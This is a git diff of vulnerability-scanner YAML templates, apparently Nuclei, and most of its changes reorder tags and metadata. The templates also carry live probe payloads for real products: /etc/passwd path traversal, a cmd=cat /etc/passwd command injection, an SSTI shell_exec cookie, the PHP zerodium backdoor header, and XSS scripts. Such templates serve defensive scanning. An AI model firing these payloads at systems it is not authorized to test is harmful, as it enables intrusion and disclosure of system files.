b/http/vulnerabilities/other/microstrategy-ssrf.yaml index ae3c1aaa86..0fb3ee09ea 100644 --- a/http/vulnerabilities/other/microstrategy-ssrf.yaml +++ b/http/vulnerabilities/other/microstrategy-ssrf.yaml @@ -7,9 +7,9 @@ info: description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener. reference: - https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 - tags: microstrategy,ssrf metadata: max-request: 2 + tags: microstrategy,ssrf http: - method: GET diff --git a/http/vulnerabilities/other/mida-eframework-xss.yaml b/http/vulnerabilities/other/mida-eframework-xss.yaml index 4d71231756..5541aca28c 100644 --- a/http/vulnerabilities/other/mida-eframework-xss.yaml +++ b/http/vulnerabilities/other/mida-eframework-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: mida,xss,edb metadata: max-request: 1 + tags: mida,xss,edb http: - raw: diff --git a/http/vulnerabilities/other/minimouse-lfi.yaml b/http/vulnerabilities/other/minimouse-lfi.yaml index daddf698e4..16093d7c6d 100644 --- a/http/vulnerabilities/other/minimouse-lfi.yaml +++ b/http/vulnerabilities/other/minimouse-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,edb,minimouse metadata: max-request: 1 + tags: lfi,edb,minimouse http: - method: GET diff --git a/http/vulnerabilities/other/mirai-unknown-rce.yaml b/http/vulnerabilities/other/mirai-unknown-rce.yaml index 3195631a1b..82680ca75b 100644 --- a/http/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/http/vulnerabilities/other/mirai-unknown-rce.yaml @@ -10,11 +10,11 @@ info: - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: mirai,rce,oast metadata: max-request: 1 + tags: mirai,rce,oast http: - raw: diff --git a/http/vulnerabilities/other/mpsec-lfi.yaml b/http/vulnerabilities/other/mpsec-lfi.yaml index 0e6d14593f..71fb6b8463 100644 --- a/http/vulnerabilities/other/mpsec-lfi.yaml +++ b/http/vulnerabilities/other/mpsec-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: mpsec,lfi metadata: max-request: 2 + tags: mpsec,lfi http: - method: GET diff --git a/http/vulnerabilities/other/myucms-lfr.yaml b/http/vulnerabilities/other/myucms-lfr.yaml index 5a642c0ac2..1357385c42 100644 --- a/http/vulnerabilities/other/myucms-lfr.yaml +++ b/http/vulnerabilities/other/myucms-lfr.yaml @@ -11,14 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: myucms,lfi metadata: max-request: 1 + tags: myucms,lfi http: - method: GET path: - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" + matchers: - type: regex regex: diff --git a/http/vulnerabilities/other/nacos-auth-bypass.yaml b/http/vulnerabilities/other/nacos-auth-bypass.yaml index 855ac85f00..1df06565c3 100644 --- a/http/vulnerabilities/other/nacos-auth-bypass.yaml +++ b/http/vulnerabilities/other/nacos-auth-bypass.yaml @@ -11,9 +11,9 @@ info: - https://nacos.io/en-us/docs/auth.html - https://zhuanlan.zhihu.com/p/602021283 metadata: - fofa-query: app="NACOS" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="NACOS" tags: nacos,auth-bypass http: @@ -21,10 +21,11 @@ http: path: - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" + headers: serverIdentity: security - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/natshell-path-traversal.yaml b/http/vulnerabilities/other/natshell-path-traversal.yaml index ae2cd11c26..8cd3176fff 100644 --- a/http/vulnerabilities/other/natshell-path-traversal.yaml +++ b/http/vulnerabilities/other/natshell-path-traversal.yaml @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "toor:[x*]:0:0" diff --git a/http/vulnerabilities/other/natshell-rce.yaml b/http/vulnerabilities/other/natshell-rce.yaml index ca445fbf6b..efe87d202b 100644 --- a/http/vulnerabilities/other/natshell-rce.yaml +++ b/http/vulnerabilities/other/natshell-rce.yaml @@ -10,22 +10,22 @@ info: - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: natshell,rce metadata: max-request: 1 + tags: natshell,rce http: - method: POST path: - "{{BaseURL}}/debug.php" + body: | cmd=cat /etc/passwd matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/vulnerabilities/other/netgear-router-auth-bypass.yaml b/http/vulnerabilities/other/netgear-router-auth-bypass.yaml index 0e32555525..39ae50c5f9 100644 --- a/http/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cwe-id: CWE-287 - tags: netgear,auth-bypass,router metadata: max-request: 2 + tags: netgear,auth-bypass,router http: - raw: @@ -22,7 +22,6 @@ http: GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/netgear-router-exposure.yaml b/http/vulnerabilities/other/netgear-router-exposure.yaml index f9de3017ae..61fad55e40 100644 --- a/http/vulnerabilities/other/netgear-router-exposure.yaml +++ b/http/vulnerabilities/other/netgear-router-exposure.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: edb,netgear,exposure,iot,router metadata: max-request: 1 + tags: edb,netgear,exposure,iot,router http: - method: GET diff --git a/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml b/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml index e0c784df84..c6f0657a76 100644 --- a/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cwe-id: CWE-287 - tags: netgear,auth-bypass,router,iot metadata: max-request: 1 + tags: netgear,auth-bypass,router,iot http: - method: GET diff --git a/http/vulnerabilities/other/netis-info-leak.yaml b/http/vulnerabilities/other/netis-info-leak.yaml index 8537c34f7b..8be6c9947f 100644 --- a/http/vulnerabilities/other/netis-info-leak.yaml +++ b/http/vulnerabilities/other/netis-info-leak.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: netis,exposure,edb metadata: max-request: 1 + tags: netis,exposure,edb http: - raw: diff --git a/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index c0270b827a..2a532704ad 100644 --- a/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: exposure,config,lfi,nginx metadata: max-request: 3 + tags: exposure,config,lfi,nginx http: - method: GET @@ -24,9 +24,9 @@ http: - "{{BaseURL}}///../app.js" stop-at-first-match: true + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/nginx-module-vts-xss.yaml b/http/vulnerabilities/other/nginx-module-vts-xss.yaml index 5244d1b555..73a51b0d82 100644 --- a/http/vulnerabilities/other/nginx-module-vts-xss.yaml +++ b/http/vulnerabilities/other/nginx-module-vts-xss.yaml @@ -11,16 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: nginx,xss,status metadata: max-request: 2 + tags: nginx,xss,status http: - raw: - | GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - - | GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml b/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml index 2c1864a828..b14df1ad4b 100644 --- a/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml +++ b/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml @@ -11,9 +11,9 @@ info: - https://www.ctfiot.com/124166.html - https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/nginxwebui-runcmd-remote-command-execution-vulnerability metadata: + verified: true max-request: 1 shodan-query: html:"nginxWebUI" - verified: true tags: nginx,nginxwebui,rce http: diff --git a/http/vulnerabilities/other/ns-asg-file-read.yaml b/http/vulnerabilities/other/ns-asg-file-read.yaml index af9d964378..c5b0c31d76 100644 --- a/http/vulnerabilities/other/ns-asg-file-read.yaml +++ b/http/vulnerabilities/other/ns-asg-file-read.yaml @@ -8,14 +8,14 @@ info: reference: - https://zhuanlan.zhihu.com/p/368054963 - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md - metadata: - max-request: 2 - fofa-query: app="网康科技-NS-ASG安全网关" - shodan-query: http.title:“NS-ASG” classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + metadata: + max-request: 2 + shodan-query: http.title:“NS-ASG” + fofa-query: app="网康科技-NS-ASG安全网关" tags: nsasg,lfi http: @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" stop-at-first-match: true + matchers-condition: or matchers: - type: regex diff --git a/http/vulnerabilities/other/nuuo-file-inclusion.yaml b/http/vulnerabilities/other/nuuo-file-inclusion.yaml index e8a6ff15dc..bc9eac615f 100644 --- a/http/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/http/vulnerabilities/other/nuuo-file-inclusion.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,edb,nuuo metadata: max-request: 1 + tags: lfi,edb,nuuo http: - method: GET diff --git a/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index 41bfb0e3b7..7aed2ad03e 100644 --- a/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -12,11 +12,11 @@ info: - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: rce,nuuo,nvrmini,edb,packetstorm metadata: max-request: 1 + tags: rce,nuuo,nvrmini,edb,packetstorm http: - method: GET diff --git a/http/vulnerabilities/other/odoo-cms-redirect.yaml b/http/vulnerabilities/other/odoo-cms-redirect.yaml index 99c16e6e14..830f29f18f 100644 --- a/http/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/http/vulnerabilities/other/odoo-cms-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: odoo,redirect metadata: max-request: 1 + tags: odoo,redirect http: - method: GET diff --git a/http/vulnerabilities/other/oliver-library-lfi.yaml b/http/vulnerabilities/other/oliver-library-lfi.yaml index cb34bb929b..1883e0af74 100644 --- a/http/vulnerabilities/other/oliver-library-lfi.yaml +++ b/http/vulnerabilities/other/oliver-library-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,oliver,edb,windows metadata: max-request: 1 + tags: lfi,oliver,edb,windows http: - method: GET diff --git a/http/vulnerabilities/other/onlinefarm-management-xss.yaml b/http/vulnerabilities/other/onlinefarm-management-xss.yaml index e27ba09bb5..a4b93fbb49 100644 --- a/http/vulnerabilities/other/onlinefarm-management-xss.yaml +++ b/http/vulnerabilities/other/onlinefarm-management-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 tags: onlinefarm,cms,xss,edb http: @@ -28,6 +28,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/opencti-lfi.yaml b/http/vulnerabilities/other/opencti-lfi.yaml index 1613c98017..95cea235e0 100644 --- a/http/vulnerabilities/other/opencti-lfi.yaml +++ b/http/vulnerabilities/other/opencti-lfi.yaml @@ -8,14 +8,14 @@ info: reference: - https://cxsecurity.com/issue/WLB-2020060078 - https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1 - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"OpenCTI" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"OpenCTI" tags: opencti,lfi,oss http: @@ -25,7 +25,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index 5e4dea89f4..021d8a0be0 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -17,9 +17,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 1 shodan-query: title:"OpenNMS Web Console" - verified: true tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/opensis-lfi.yaml b/http/vulnerabilities/other/opensis-lfi.yaml index 9db1a8cd2f..b842317fa9 100644 --- a/http/vulnerabilities/other/opensis-lfi.yaml +++ b/http/vulnerabilities/other/opensis-lfi.yaml @@ -7,13 +7,13 @@ info: description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. reference: - https://www.exploit-db.com/exploits/38039 - metadata: - max-request: 2 - shodan-query: http.title:"openSIS" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + metadata: + max-request: 2 + shodan-query: http.title:"openSIS" tags: opensis,lfi,edb http: @@ -24,7 +24,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/opensns-rce.yaml b/http/vulnerabilities/other/opensns-rce.yaml index f1b0c35726..4e09dc4618 100644 --- a/http/vulnerabilities/other/opensns-rce.yaml +++ b/http/vulnerabilities/other/opensns-rce.yaml @@ -8,11 +8,11 @@ info: OpenSNS allows remote unauthenticated attackers to execute arbitrary code via the 'shareBox' endpoint. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: opensns,rce metadata: max-request: 2 + tags: opensns,rce http: - method: GET diff --git a/http/vulnerabilities/other/openvpn-hhi.yaml b/http/vulnerabilities/other/openvpn-hhi.yaml index e9ce541af2..3abdcb7b78 100644 --- a/http/vulnerabilities/other/openvpn-hhi.yaml +++ b/http/vulnerabilities/other/openvpn-hhi.yaml @@ -5,9 +5,9 @@ info: author: twitter.com/Dheerajmadhukar severity: info description: A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field. - tags: openvpn,hostheader-injection metadata: max-request: 1 + tags: openvpn,hostheader-injection http: - raw: @@ -17,7 +17,6 @@ http: matchers-condition: and matchers: - - type: word words: - "https://{{randstr}}.tld/__session_start__/" diff --git a/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index 4d4b009644..ea58fa90e1 100644 --- a/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -10,11 +10,11 @@ info: - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: optiLink,rce,oast,mirai,packetstorm metadata: max-request: 1 + tags: optiLink,rce,oast,mirai,packetstorm http: - raw: diff --git a/http/vulnerabilities/other/oracle-fatwire-lfi.yaml b/http/vulnerabilities/other/oracle-fatwire-lfi.yaml index 281445e6cd..d3b68570d6 100644 --- a/http/vulnerabilities/other/oracle-fatwire-lfi.yaml +++ b/http/vulnerabilities/other/oracle-fatwire-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: lfi,oracle,fatwire,edb metadata: max-request: 1 + tags: lfi,oracle,fatwire,edb http: - method: GET diff --git a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml index 543b431220..d979bffb9f 100644 --- a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml +++ b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: bscw,orbiteam,lfi,unauth,packetstorm metadata: max-request: 1 + tags: bscw,orbiteam,lfi,unauth,packetstorm http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/otobo-open-redirect.yaml b/http/vulnerabilities/other/otobo-open-redirect.yaml index 9c9f3c7976..aa32d49460 100644 --- a/http/vulnerabilities/other/otobo-open-redirect.yaml +++ b/http/vulnerabilities/other/otobo-open-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,otobo,huntr metadata: max-request: 1 + tags: redirect,otobo,huntr http: - method: GET diff --git a/http/vulnerabilities/other/pacsone-server-lfi.yaml b/http/vulnerabilities/other/pacsone-server-lfi.yaml index 8dea98c175..e9b8f9b24f 100644 --- a/http/vulnerabilities/other/pacsone-server-lfi.yaml +++ b/http/vulnerabilities/other/pacsone-server-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: pacsone,lfi metadata: max-request: 1 + tags: pacsone,lfi http: - method: GET diff --git a/http/vulnerabilities/other/panabit-ixcache-rce.yaml b/http/vulnerabilities/other/panabit-ixcache-rce.yaml index 7e3270c00a..7e806d16ed 100644 --- a/http/vulnerabilities/other/panabit-ixcache-rce.yaml +++ b/http/vulnerabilities/other/panabit-ixcache-rce.yaml @@ -10,9 +10,9 @@ info: - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/Panabit/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: + max-request: 2 fofa-qeury: title="iXCache" veified: true - max-request: 2 tags: panabit,rce,ixcache,intrusive http: @@ -23,7 +23,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | POST /cgi-bin/Maintain/date_config HTTP/1.1 Host: {{Hostname}} @@ -33,7 +32,6 @@ http: cookie-reuse: true attack: pitchfork - payloads: username: - admin diff --git a/http/vulnerabilities/other/parallels-hsphere-xss.yaml b/http/vulnerabilities/other/parallels-hsphere-xss.yaml index b753651340..60a872bf72 100644 --- a/http/vulnerabilities/other/parallels-hsphere-xss.yaml +++ b/http/vulnerabilities/other/parallels-hsphere-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"h-sphere" tags: hsphere,xss,edb,parallels @@ -25,9 +25,9 @@ http: - '{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - 'value="\">' diff --git a/http/vulnerabilities/other/parentlink-xss.yaml b/http/vulnerabilities/other/parentlink-xss.yaml index b228fb89f1..11d696b401 100644 --- a/http/vulnerabilities/other/parentlink-xss.yaml +++ b/http/vulnerabilities/other/parentlink-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: blackboard,parentlink,xss metadata: max-request: 2 + tags: blackboard,parentlink,xss http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: word words: - '' diff --git a/http/vulnerabilities/other/pbootcms-database-file-download.yaml b/http/vulnerabilities/other/pbootcms-database-file-download.yaml index b8df4e24d0..d7642d024e 100644 --- a/http/vulnerabilities/other/pbootcms-database-file-download.yaml +++ b/http/vulnerabilities/other/pbootcms-database-file-download.yaml @@ -10,11 +10,11 @@ info: - https://www.cnblogs.com/0daybug/p/12786036.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: pbootcms,db,exposure,database,sqlite metadata: max-request: 1 + tags: pbootcms,db,exposure,database,sqlite http: - method: GET @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/data/pbootcms.db" max-size: 20000 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml index 802c068cf4..98f06260c8 100644 --- a/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml +++ b/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml @@ -9,23 +9,25 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-1336 - tags: ssti,rce,csrf metadata: max-request: 1 + tags: ssti,rce,csrf http: - method: GET path: - "{{BaseURL}}" + headers: Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" - skip-variables-check: true + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/php-timeclock-xss.yaml b/http/vulnerabilities/other/php-timeclock-xss.yaml index 62ac31b079..1f268a29ec 100644 --- a/http/vulnerabilities/other/php-timeclock-xss.yaml +++ b/http/vulnerabilities/other/php-timeclock-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,php,timeclock,edb metadata: max-request: 1 + tags: xss,php,timeclock,edb,intrusive http: - method: GET @@ -25,6 +25,7 @@ http: - type: status status: - 200 + - type: word words: - "" diff --git a/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index fdfcf7e10e..fd88877e54 100644 --- a/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -12,16 +12,17 @@ info: - https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: php,backdoor,rce,zerodium metadata: max-request: 1 + tags: php,backdoor,rce,zerodium http: - method: GET path: - "{{BaseURL}}" + headers: User-Agentt: zerodiumvar_dump(233333*333332); diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml index 35f3a1a53d..99f08ec16f 100644 --- a/http/vulnerabilities/other/phpldapadmin-xss.yaml +++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml @@ -7,9 +7,9 @@ info: reference: - https://twitter.com/GodfatherOrwa/status/1701392754251563477 metadata: + verified: true max-request: 9 shodan-query: html:"phpLDAPadmin" - verified: true tags: php,phpldapadmin,xss http: @@ -28,6 +28,7 @@ http: stop-at-first-match: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/phpok-sqli.yaml b/http/vulnerabilities/other/phpok-sqli.yaml index 98dc8cd0b7..1d07d68002 100644 --- a/http/vulnerabilities/other/phpok-sqli.yaml +++ b/http/vulnerabilities/other/phpok-sqli.yaml @@ -9,14 +9,13 @@ info: - https://cve.report/software/phpok/phpok classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="phpok" tags: phpok,sqli - variables: num: "999999999" diff --git a/http/vulnerabilities/other/phpwiki-lfi.yaml b/http/vulnerabilities/other/phpwiki-lfi.yaml index 251fd4dc55..d77792efc7 100644 --- a/http/vulnerabilities/other/phpwiki-lfi.yaml +++ b/http/vulnerabilities/other/phpwiki-lfi.yaml @@ -7,9 +7,9 @@ info: description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. reference: - https://www.exploit-db.com/exploits/38027 - tags: xss,edb,phpwiki,lfi metadata: max-request: 1 + tags: xss,edb,phpwiki,lfi http: - method: GET @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/pmb-directory-traversal.yaml b/http/vulnerabilities/other/pmb-directory-traversal.yaml index ba675ef7b9..6dcd2fa6a0 100644 --- a/http/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/http/vulnerabilities/other/pmb-directory-traversal.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,packetstorm metadata: max-request: 2 + tags: lfi,packetstorm http: - method: GET @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/other/pmb-local-file-disclosure.yaml b/http/vulnerabilities/other/pmb-local-file-disclosure.yaml index e7df4886c0..d96ae42f6c 100644 --- a/http/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/http/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -3,17 +3,17 @@ id: pmb-local-file-disclosure info: name: PMB 5.6 - Local File Inclusion author: 